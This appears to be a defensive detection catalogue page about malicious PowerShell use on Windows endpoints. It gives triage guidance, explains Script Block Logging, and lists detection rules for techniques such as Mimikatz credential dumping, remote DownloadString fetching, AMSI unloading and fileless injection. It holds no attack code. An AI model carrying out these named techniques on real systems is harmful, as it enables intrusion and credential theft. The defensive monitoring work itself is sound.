Analytics Story: Malicious PowerShell

Description

Attackers are finding stealthy ways "live off the land," leveraging utilities and tools that come standard on the endpoint--such as PowerShell--to achieve their goals without downloading binary files. These searches can help you detect and investigate PowerShell command-line options that may be indicative of malicious intent.

Why it matters

The searches in this Analytic Story monitor for parameters often used for malicious purposes. It is helpful to understand how often the notable events generated by this story occur, as well as the commonalities between some of these events. These factors may provide clues about whether this is a common occurrence of minimal concern or a rare event that may require more extensive investigation. Likewise, it is important to determine whether the issue is restricted to a single user/system or is broader in scope. The following factors may assist you in determining whether the event is malicious:

  1. Country of origin
  2. Responsible party
  3. Fully qualified domain names associated with the external IP address
  4. Registration of fully qualified domain names associated with external IP address Determining whether it is a dynamic domain frequently visited by others and/or how third parties categorize it can also help you answer some questions surrounding the attacker and details related to the external system. In addition, there are various sources--such as VirusTotal— that can provide some reputation information on the IP address or domain name, which can assist in determining whether the event is malicious. Finally, determining whether there are other events associated with the IP address may help connect data points or show other events that should be brought into scope. Gathering data on the system of interest can sometimes help you quickly determine whether something suspicious is happening. Some of these items include finding out who else may have recently logged into the system, whether any unusual scheduled tasks exist, whether the system is communicating on suspicious ports, whether there are modifications to sensitive registry keys, and whether there are any known vulnerabilities on the system. This information can often highlight other activity commonly seen in attack scenarios or give more information about how the system may have been targeted. Often, a simple inspection of the process name and path can tell you if the system has been compromised. For example, if svchost.exe is found running from a location other than C:\Windows\System32, it is likely something malicious designed to hide in plain sight when cursorily reviewing process names. Similarly, if the process itself seems legitimate, but the parent process is running from the temporary browser cache, that could be indicative of activity initiated via a compromised website a user visited. It can also be very helpful to examine various behaviors of the process of interest or the parent of the process of interest. For example, if it turns out the process of interest is malicious, it would be good to see if the parent to that process spawned other processes that might be worth further scrutiny. If a process is suspect, a review of the network connections made in and around the time of the event and/or whether the process spawned any child processes could be helpful, as well. In the event a system is suspected of having been compromised via a malicious website, we suggest reviewing the browsing activity from that system around the time of the event. If categories are given for the URLs visited, that can help you zero in on possible malicious sites. Most recently we have added new content related to PowerShell Script Block logging, Windows EventCode 4104. Script block logging presents the deobfuscated and raw script executed on an endpoint. The analytics produced were tested against commonly used attack frameworks - PowerShell-Empire, Cobalt Strike and Covenant. In addition, we sampled publicly available samples that utilize PowerShell and validated coverage. The analytics are here to identify suspicious usage, cmdlets, or script values. 4104 events are enabled via the Windows registry and may generate a large volume of data if enabled globally. Enabling on critical systems or a limited set may be best. During triage of 4104 events, review parallel processes for other processes and command executed. Identify any file modifications and network communication and review accordingly. Fortunately, we get the full script to determine the level of threat identified.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
Suspicious Powershell Command-Line Arguments PowerShell TTP
Any Powershell DownloadFile Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer TTP
Any Powershell DownloadString Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer TTP
Detect Certify With PowerShell Script Block Logging Steal or Forge Authentication Certificates, Command and Scripting Interpreter, PowerShell TTP
Detect Empire with PowerShell Script Block Logging Command and Scripting Interpreter, PowerShell TTP
Detect Mimikatz With PowerShell Script Block Logging OS Credential Dumping, PowerShell TTP
GetLocalUser with PowerShell Script Block Account Discovery, Local Account, PowerShell Hunting
GetWmiObject User Account with PowerShell Script Block Account Discovery, Local Account, PowerShell Hunting
Malicious Powershell Executed As A Service System Services, Service Execution TTP
Malicious PowerShell Process - Encoded Command Obfuscated Files or Information Hunting
Malicious PowerShell Process With Obfuscation Techniques Command and Scripting Interpreter, PowerShell TTP
Possible Lateral Movement PowerShell Spawn Remote Services, Distributed Component Object Model, Windows Remote Management, Windows Management Instrumentation, Scheduled Task, Windows Service, PowerShell, MMC TTP
PowerShell 4104 Hunting Command and Scripting Interpreter, PowerShell Hunting
PowerShell - Connect To Internet With Hidden Window PowerShell, Command and Scripting Interpreter Hunting
Powershell COM Hijacking InprocServer32 Modification Component Object Model Hijacking, Command and Scripting Interpreter, PowerShell TTP
Powershell Creating Thread Mutex Obfuscated Files or Information, Indicator Removal from Tools, PowerShell TTP
PowerShell Domain Enumeration Command and Scripting Interpreter, PowerShell TTP
PowerShell Enable PowerShell Remoting PowerShell, Command and Scripting Interpreter Anomaly
Powershell Enable SMB1Protocol Feature Obfuscated Files or Information, Indicator Removal from Tools TTP
Powershell Execute COM Object Component Object Model Hijacking, Event Triggered Execution, PowerShell TTP
Powershell Fileless Process Injection via GetProcAddress Command and Scripting Interpreter, Process Injection, PowerShell TTP
Powershell Fileless Script Contains Base64 Encoded Content Command and Scripting Interpreter, Obfuscated Files or Information, PowerShell TTP
PowerShell Invoke CIMMethod CIMSession Windows Management Instrumentation Anomaly
PowerShell Loading DotNET into Memory via Reflection Command and Scripting Interpreter, PowerShell TTP
Powershell Processing Stream Of Data Command and Scripting Interpreter, PowerShell TTP
PowerShell Script Block With URL Chain PowerShell, Ingress Tool Transfer TTP
Powershell Using memory As Backing Store PowerShell, Command and Scripting Interpreter TTP
PowerShell WebRequest Using Memory Stream PowerShell, Ingress Tool Transfer, Fileless Storage TTP
Recon AVProduct Through Pwh or WMI Gather Victim Host Information TTP
Recon Using WMI Class Gather Victim Host Information, PowerShell Anomaly
ServicePrincipalNames Discovery with PowerShell Kerberoasting TTP
Set Default PowerShell Execution Policy To Unrestricted or Bypass Command and Scripting Interpreter, PowerShell TTP
Unloading AMSI via Reflection Impair Defenses, PowerShell, Command and Scripting Interpreter TTP
Windows Enable PowerShell Web Access PowerShell TTP
WMI Recon Running Process Or Services Gather Victim Host Information Anomaly

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Powershell Script Block Logging 4104 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 12 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows xmlwineventlog XmlWinEventLog:Security
Windows Event Log System 7045 Windows icon Windows xmlwineventlog XmlWinEventLog:System

References


Source: GitHub | Version: 5